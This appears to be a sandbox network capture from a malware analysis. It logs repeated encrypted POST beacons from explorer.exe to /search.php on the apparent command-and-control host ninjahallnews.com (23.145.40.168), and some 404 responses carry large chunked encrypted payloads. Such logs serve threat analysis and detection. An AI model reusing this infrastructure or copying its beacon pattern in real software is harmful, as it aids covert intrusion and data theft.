2024-10-07 22:20:46 UTC | 332 bytes | OUT | Data Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 69 34 01 83 b7 25 93 3c 61 fd 17 a4 8d f4 42 5f d4 78 20 b7 38 f2 80 29 09 d2 70 54 33 dd e5 e1 32 de c1 58 07 cc fd 31 8e 48 52 84 85 75 7b 56 6e 20 0d f4 2f d1 81 bb 5b f6 f6 25 76 0b ef 7f 07 f6 75 6f fa 86 82 9f 39 38 84 6c be 36 e8 67 69 8e 10 c2 37 41 4b 35 44 f7 a6 07 e9 c0 3c f2 3c 3d d1 a2 d8 55 c6 fb 0c b0 b8 99 c7 18 42 a6 db c6 7b 30 c4 58 21 8e 77 05 3c f5 28 76 3c a8 31 7f 49 e9 8e 94 70 63 bc a9 6c fe 42 88 c0 a5 68 77 16 2f d7 5d 63 0d 5d 19 e7 57 e7 df 13 26 13 78 3d d1 8b 3e 6f 2e 0e 95 9d c4 22 93 af 6e d0 62 a7 e6 d3 d8 60 a4 6d
Data Ascii: r{O)fz<pqB )6IP g3iqH[@Li4%<aB_x 8)pT32X1HRu{Vn /[%vuo98l6gi7AK5D<<=UB{0X!w<(v<1IpclBhw/]c]W&x=>o."nb`m
2024-10-07 22:20:46 UTC | 278 bytes | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 22:20:46 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49919 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 22:20:47 UTC | 289 bytes | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://nnyeswfjrdkwqexg.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 311
Host: ninjahallnews.com
2024-10-07 22:20:47 UTC | 311 bytes | OUT | Data Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6e 34 01 83 b7 25 93 3c 37 ea 16 f3 a8 fc 5a 39 e1 1a 09 fc 51 d5 cd 78 15 e8 0e 21 2a c9 fd 92 21 c5 a4 69 11 e3 f0 70 9c 72 33 b1 89 4e 3d 62 15 21 04 88 07 ba 87 da 54 cd e1 45 03 22 98 04 28 a1 46 1c 83 f1 98 db 3b 05 d7 76 be 55 97 6b 59 c7 00 af 6e 2a 46 0e 68 f2 e1 1f 8b c7 0c f6 19 2b fc e6 88 26 f9 85 12 b4 bb a4 b7 00 38 b9 91 ac 6e 09 9a 4d 09 c1 0b 07 2e 84 4c 0c 68 b3 3a 28 35 fb bf 88 65 40 94 ea 3a f7 39 8b a9 e6 28 72 05 22 a1 6e 2b 1a 53 0a f1 5b f8 96 0c 39 32 35 39 99 a0 50 2d 4c 1f 91 f1 c0 28 d9 fd 03 9d 3c db 8e e2 bd 5d 92 53
Data Ascii: r{O)fz<pqB )6IP g3iqH[@Ln4%<7Z9Qx!*!ipr3N=b!TE"(F;vUkYn*Fh+&8nM.Lh:(5e@:9(r"n+S[9259P-L(<]S
2024-10-07 22:20:47 UTC | 278 bytes | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 22:20:47 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49925 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 22:20:49 UTC | 287 bytes | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://opoqwbbwkupiok.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 273
Host: ninjahallnews.com
2024-10-07 22:20:49 UTC | 273 bytes | OUT | Data Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6f 34 01 83 b7 25 93 3c 3d aa 7c ba c9 b5 22 23 ed 37 71 a7 24 97 86 30 13 a0 77 38 55 c6 cc 98 68 bb de 7f 52 9d 88 71 b4 71 79 e5 82 62 2b 29 09 1c 07 f5 3d a5 ec a2 4d d3 be 4e 23 3a ee 64 24 dd 53 59 fc 80 e9 d4 0e 1f a3 14 e5 7f ad 65 63 ad 4c dc 28 44 23 09 72 ec e9 7e 93 b4 12 8f 53 62 d0 a0 9d 48 d7 a5 05 ae d1 a7 a8 04 69 ba 8d a1 4d 59 a3 6c 21 ff 67 6e 0a e6 38 71 3a f2 49 17 2a ed cf 81 0b 60 92 fb 7e ac 58 c6 a2 e2 67 74 20 36 c1 0d 11 4e 08 33 c7 0c 97 a5 06 43 34 74 32 c0 88 7c 6e 3a 37 93 95 f3 1b c9 bf 08 df 47 af b2 a1 88 77 cc 3a
Data Ascii: r{O)fz<pqB )6IP g3iqH[@Lo4%<=|"#7q$0w8UhRqqyb+)=MN#:d$SYecL(D#r~SbHiMYl!gn8q:I*`~Xgt 6N3C4t2|n:7Gw:
2024-10-07 22:20:49 UTC | 278 bytes | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 22:20:49 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49931 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 22:20:50 UTC | 285 bytes | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://lrhrxwfbfqiw.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 321
Host: ninjahallnews.com
2024-10-07 22:20:50 UTC | 321 bytes | OUT | Data Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6c 34 01 83 b7 25 93 3c 75 db 3e e6 b3 ca 31 2f bd 11 1a b2 55 c8 d7 32 63 ab 6e 27 40 cf a0 cf 21 ef c3 79 18 e6 f2 49 ae 32 51 a8 91 7b 2a 3f 47 4b 3a e9 74 9e d3 aa 5e 90 f1 64 1d 3c ac 16 13 f4 5a 1c c5 fa a3 99 21 12 8c 5f ac 75 ee 0b 6a c3 2c da 32 2f 6a 37 42 b2 e3 06 ad d8 63 ef 25 6a 84 d9 ae 3f da 9d 5c f0 ca 89 c1 29 46 c6 d1 ad 09 08 c3 53 13 90 60 65 38 99 49 12 5d b7 18 33 18 9c bc d7 6b 36 b1 da 3a 92 54 e1 ea a9 0c 3e 26 33 d6 5c 1d 02 5e 16 bc 0e 9b 9b 77 57 1d 25 58 fc 83 67 23 50 56 c8 98 ff 43 e9 fa 38 ef 39 8a ba c1 cb 65 cf 6a
Data Ascii: r{O)fz<pqB )6IP g3iqH[@Ll4%<u>1/U2cn'@!yI2Q{*?GK:t^d<Z!_uj,2/j7Bc%j?\)FS`e8I]3k6:T>&3\^wW%Xg#PVC89ej
2024-10-07 22:20:51 UTC | 278 bytes | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 22:20:50 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.44994123.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:51 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://mjscupccgtmnwxhe.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 369
                                                                                                      Host: ninjahallnews.com
2024-10-07 22:20:51 UTC  369                OUT        Data Raw (hex dump of the 369-byte POST body omitted)
2024-10-07 22:20:51 UTC  278                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 07 Oct 2024 22:20:51 GMT
                                                       Server: Apache/2.4.52 (Ubuntu)
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       Content-Length: 0
                                                       Content-Type: text/html; charset=utf-8
                                                       Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.4  49948        23.145.40.168   443               2580  C:\Windows\explorer.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-07 22:20:52 UTC  287                OUT        POST /search.php HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Content-Type: application/x-www-form-urlencoded
                                                       Accept: */*
                                                       Referer: https://mygtgmevqgkpxy.com/
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                       Content-Length: 150
                                                       Host: ninjahallnews.com
2024-10-07 22:20:52 UTC  150                OUT        Data Raw (hex dump of the 150-byte POST body omitted)
2024-10-07 22:20:52 UTC  278                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 07 Oct 2024 22:20:52 GMT
                                                       Server: Apache/2.4.52 (Ubuntu)
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       Content-Length: 0
                                                       Content-Type: text/html; charset=utf-8
                                                       Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
11          192.168.2.4  49954        23.145.40.168   443               2580  C:\Windows\explorer.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-07 22:20:53 UTC  287                OUT        POST /search.php HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Content-Type: application/x-www-form-urlencoded
                                                       Accept: */*
                                                       Referer: https://jqllhnybwxcxea.net/
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                       Content-Length: 366
                                                       Host: ninjahallnews.com
2024-10-07 22:20:53 UTC  366                OUT        Data Raw (hex dump of the 366-byte POST body omitted)
2024-10-07 22:20:53 UTC  278                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 07 Oct 2024 22:20:53 GMT
                                                       Server: Apache/2.4.52 (Ubuntu)
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       Content-Length: 0
                                                       Content-Type: text/html; charset=utf-8
                                                       Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
12          192.168.2.4  49960        23.145.40.168   443               2580  C:\Windows\explorer.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-07 22:20:55 UTC  287                OUT        POST /search.php HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Content-Type: application/x-www-form-urlencoded
                                                       Accept: */*
                                                       Referer: https://pupdhamncbgqgk.org/
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                       Content-Length: 306
                                                       Host: ninjahallnews.com
2024-10-07 22:20:55 UTC  306                OUT        Data Raw (hex dump of the 306-byte POST body omitted)
2024-10-07 22:20:55 UTC  278                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 07 Oct 2024 22:20:55 GMT
                                                       Server: Apache/2.4.52 (Ubuntu)
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       Content-Length: 0
                                                       Content-Type: text/html; charset=utf-8
                                                       Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
13          192.168.2.4  49966        23.145.40.168   443               2580  C:\Windows\explorer.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-07 22:20:56 UTC  286                OUT        POST /search.php HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Content-Type: application/x-www-form-urlencoded
                                                       Accept: */*
                                                       Referer: https://lhkhfhdvkorst.org/
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                       Content-Length: 327
                                                       Host: ninjahallnews.com
2024-10-07 22:20:56 UTC  327                OUT        Data Raw (hex dump of the 327-byte POST body omitted)
2024-10-07 22:20:56 UTC  278                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 07 Oct 2024 22:20:56 GMT
                                                       Server: Apache/2.4.52 (Ubuntu)
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       Content-Length: 0
                                                       Content-Type: text/html; charset=utf-8
                                                       Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
14          192.168.2.4  49972        23.145.40.168   443               2580  C:\Windows\explorer.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-07 22:20:57 UTC  286                OUT        POST /search.php HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Content-Type: application/x-www-form-urlencoded
                                                       Accept: */*
                                                       Referer: https://vhdgrtytskult.com/
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                       Content-Length: 243
                                                       Host: ninjahallnews.com
2024-10-07 22:20:57 UTC  243                OUT        Data Raw (hex dump of the 243-byte POST body omitted)
2024-10-07 22:20:57 UTC  278                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 07 Oct 2024 22:20:57 GMT
                                                       Server: Apache/2.4.52 (Ubuntu)
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       Content-Length: 0
                                                       Content-Type: text/html; charset=utf-8
                                                       Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
15          192.168.2.4  49978        23.145.40.168   443               2580  C:\Windows\explorer.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-07 22:20:57 UTC  286                OUT        POST /search.php HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Content-Type: application/x-www-form-urlencoded
                                                       Accept: */*
                                                       Referer: https://ujxngjrjlobur.net/
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                       Content-Length: 240
                                                       Host: ninjahallnews.com
2024-10-07 22:20:57 UTC  240                OUT        Data Raw (hex dump of the 240-byte POST body omitted)
2024-10-07 22:20:58 UTC  278                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 07 Oct 2024 22:20:58 GMT
                                                       Server: Apache/2.4.52 (Ubuntu)
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       Content-Length: 0
                                                       Content-Type: text/html; charset=utf-8
                                                       Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
16          192.168.2.4  49984        23.145.40.168   443               2580  C:\Windows\explorer.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-07 22:20:58 UTC  288                OUT        POST /search.php HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Content-Type: application/x-www-form-urlencoded
                                                       Accept: */*
                                                       Referer: https://igxvqkyyvgmutmd.net/
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                       Content-Length: 289
                                                       Host: ninjahallnews.com
2024-10-07 22:20:58 UTC  289                OUT        Data Raw (hex dump of the 289-byte POST body omitted)
2024-10-07 22:20:59 UTC  278                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 07 Oct 2024 22:20:58 GMT
                                                       Server: Apache/2.4.52 (Ubuntu)
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       Content-Length: 0
                                                       Content-Type: text/html; charset=utf-8
                                                       Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
17          192.168.2.4  49994        23.145.40.168   443               2580  C:\Windows\explorer.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-07 22:20:59 UTC  287                OUT        POST /search.php HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Content-Type: application/x-www-form-urlencoded
                                                       Accept: */*
                                                       Referer: https://pkuvdwenklvosy.org/
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                       Content-Length: 154
                                                       Host: ninjahallnews.com
2024-10-07 22:20:59 UTC  154                OUT        Data Raw (hex dump of the 154-byte POST body omitted)
2024-10-07 22:21:00 UTC  294                IN         HTTP/1.1 404 Not Found
                                                       Date: Mon, 07 Oct 2024 22:21:00 GMT
                                                       Server: Apache/2.4.52 (Ubuntu)
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       Content-Type: text/html; charset=utf-8
                                                       Connection: close
                                                       Transfer-Encoding: chunked
                                                                                                      2024-10-07 22:21:00 UTC7898INData Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 5b 8a 82 ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07
                                                                                                      Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju|n'|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU[44A:F=
                                                                                                      2024-10-07 22:21:00 UTC19INData Raw: 1a 58 b3 14 d0 ff ef 1b ab d5 44 9d a9 19 24 1b 3c de a6
                                                                                                      Data Ascii: XD$<
                                                                                                      2024-10-07 22:21:00 UTC2INData Raw: 0d 0a
                                                                                                      Data Ascii:
                                                                                                      2024-10-07 22:21:00 UTC8192INData Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4
                                                                                                      Data Ascii: 2000O{[/Iu@Qp3TsEsp|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
                                                                                                      2024-10-07 22:21:00 UTC6INData Raw: 4e 13 8c ae b0 c7
                                                                                                      Data Ascii: N
                                                                                                      2024-10-07 22:21:00 UTC2INData Raw: 0d 0a
                                                                                                      Data Ascii:
                                                                                                      2024-10-07 22:21:00 UTC8192INData Raw: 32 30 30 30 0d 0a 37 b0 80 d9 81 f6 4b 57 1e 8f 04 5f c4 c0 88 47 ee 18 f5 d8 ff a1 a2 c6 ae 36 1a 9d e0 fb 7a 50 95 22 b5 51 4d 25 b1 f4 18 0c 15 d1 06 0a 15 7b 23 d8 b9 63 41 09 53 8b 61 24 04 92 dd b9 c9 34 db 29 b1 d3 b5 7d 9b b6 ff 21 7f 68 a3 a1 98 ca f2 df ce 52 bb f4 67 4b 05 db df 01 f6 41 65 c4 8c 63 3c 95 b8 4a 79 8f 0e fc ec 98 91 1c 6c 75 27 c8 43 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 67 b6 ef 85 11 52 c9 bf 4e b0 d6 66 9d d8 30 3f 8d 93 5a f5 d5 f3 5f 31 3d a5 2e 45 85 49 21 aa 61 86 37 f7 f5 9a 70 4c 4d f9 1c fb e1 fe d1 ee cb fa 02 71 1e 89 dd 8a 35
                                                                                                      Data Ascii: 20007KW_G6zP"QM%{#cASa$4)}!hRgKAec<Jylu'CUfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"vgRNf0?Z_1=.EI!a7pLMq5
                                                                                                      2024-10-07 22:21:00 UTC6INData Raw: eb 47 a6 2d 95 51
                                                                                                      Data Ascii: G-Q
                                                                                                      2024-10-07 22:21:00 UTC2INData Raw: 0d 0a
                                                                                                      Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 50001 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 22:21:01 UTC | 287 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://mmqmkrfdtvmaos.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 248
Host: ninjahallnews.com
2024-10-07 22:21:01 UTC | 248 | OUT | Data Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 65 34 01 83 b6 25 93 3c 43 b6 62 e9 ce b0 35 30 df 22 65 81 2a d7 83 19 07 f6 32 3a 3c ad d4 88 41 f1 a6 1a 0b ed 8e 74 ac 58 21 93 c3 71 21 79 7d 41 37 f6 38 cd 9f 81 28 ef b6 43 11 3e 99 0a 59 f3 71 51 cc fa e1 c0 2d 2c a8 14 d1 71 f2 30 5c 9b 23 9f 37 32 77 27 5c c6 f6 62 e3 c2 36 91 0f 20 f2 d1 d9 13 b9 f5 47 a0 83 88 aa 09 5f aa d9 a0 03 23 ba 19 0e 89 74 17 24 82 6b 16 43 b2 5a 71 50 8b d2 f9 2a 7f 92 a9 38 e2 4b f1 be f8 60 06 3a 4b de 71 22 1f 09 79 de 4b 8b cd 30 5a 33 4a 16 f1 e1 5c 53 3f 01 b0 e8 f2 4d e9 ba 11 c2 14
Data Ascii: r{O)fz<pqB )6IP g3iqH[ALe4%<Cb50"e*2:<AtX!q!y}A78(C>YqQ-,q0\#72w'\b6 G_#t$kCZqP*8K`:Kq"yK0Z3J\S?M
2024-10-07 22:21:01 UTC | 287 | IN | HTTP/1.1 404 Not Found
Date: Mon, 07 Oct 2024 22:21:01 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 409
Content-Type: text/html; charset=utf-8
Connection: close
2024-10-07 22:21:01 UTC | 409 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 50007 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 22:21:02 UTC | 284 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://klmaxatwhce.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 268
Host: ninjahallnews.com
